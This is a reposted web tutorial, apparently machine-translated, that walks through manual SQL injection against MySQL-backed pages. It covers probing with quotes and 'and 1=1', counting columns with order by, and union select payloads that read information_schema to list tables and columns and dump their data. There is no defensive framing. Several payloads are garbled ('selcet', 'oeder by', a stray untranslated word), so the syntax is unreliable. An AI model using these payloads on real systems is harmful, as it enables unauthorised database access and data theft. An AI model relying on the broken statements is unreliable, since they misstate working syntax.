Home > Database > SQL > Let's talk about the simple manual SQL injection process

Let's talk about the simple manual SQL injection process

WBOY
Release: 2022-01-28 17:02:47
forward
4647 people have browsed it

This article brings you issues related to manual injection in SQL, including issues related to determining the injection point and determining the injection type. I hope it will be helpful to everyone.

Let's talk about the simple manual SQL injection process

Determine the injection point

1. Single quotation mark method: add a single quotation mark directly after the URL. If the page cannot be displayed normally, the browser will return some exceptions information, it indicates that the link may have a sql injection vulnerability

2.1=1 and 1=2: Add and 1=1 to the get parameter after the URL, the display is normal, replace 1=1 with 1 =2, the display is abnormal, indicating that there is SQL injection in the web page.

Judge the injection type

1. Numeric injection: the value of the injected variable does not need to be enclosed in quotation marks, such as

select * from user where id=$id;
Copy after login

2. Character injection: the injected variable will be used Wrap it in quotation marks, such as `

select * from user where username='$username';`
Copy after login

Be sure to close the quotation marks when injecting.
3. Search injection:

select * from user where username like '%$pass%';
Copy after login

Construct the sql statement as

select * from user where username like '%$pass%' union select语句 '%%';
Copy after login

That is, the transferred variable is pass%’ union select statement ‘% to form a closure.

Determine the injection point submission method

Determine whether the injection point submission method is get, post, or cookie through packet capture and other methods.

Use order by to query fields

Use the order by statement to query how many fields there are in the database. You can determine the number of database fields through constant attempts. For example, when entering oeder by 9, the page When an error is reported and order by 8 is entered, the page displays normally, that is, there are 8 fields in the database.
For example, the query statement is: select * from user where id='$id';
The following input can be constructed: (id = ') ' order by 3 ' --
That is, the query statement is: select * from user where id='' order by 3 '--'

Use joint query to query the current database, user, and version Information

Use the union select statement to query the current user user(), database database(), database version version(), server operating system @@version_compile_os and other information
The version version is very important. If the version In 5.0 and above, you can use the information_schema library to easily query the desired information
Construction statement:

select * from user where id='' union select user(),database(),version()+--+;
Copy after login

Query the tables, columns and values ​​in the current database

5.0 or above The information_schema library that comes with the mysql database stores all table names and listed information in the database.
Next we should check the information of all tables named tables according to the result of the current database query in step 5 (for example, the database is database_1).
Information_schema.tables: A table that records all table name information in the database.
The constructed query statement is as follows:

Select * from user where id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database_1;--
Copy after login

The result of the query is: the table name information in the current database queried in the fifth step.
Information_schema.columns: Records the column name information of all tables in the database;
Next, you should query its columns based on the table name information obtained from the above query (for example, the table is table_1) Name information, construct the statement as follows:

Select * from user where id='' union selcet 1,group_concat(column_name),3 from information_schema.columns where table_name=table_1;--
Copy after login

After querying the column name, you can directly find out the information stored in the table through a joint query (for example, the found column names are column_1, column_2) Constructing the statement

Selcet * from user where id='' union select 1,column_1,column_2 from tables;--
Copy after login

You can query the stored data in the specified table of the specified database

Recommended learning: mysql video tutorial

The above is the detailed content of Let's talk about the simple manual SQL injection process. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
sql
source:csdn.net
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template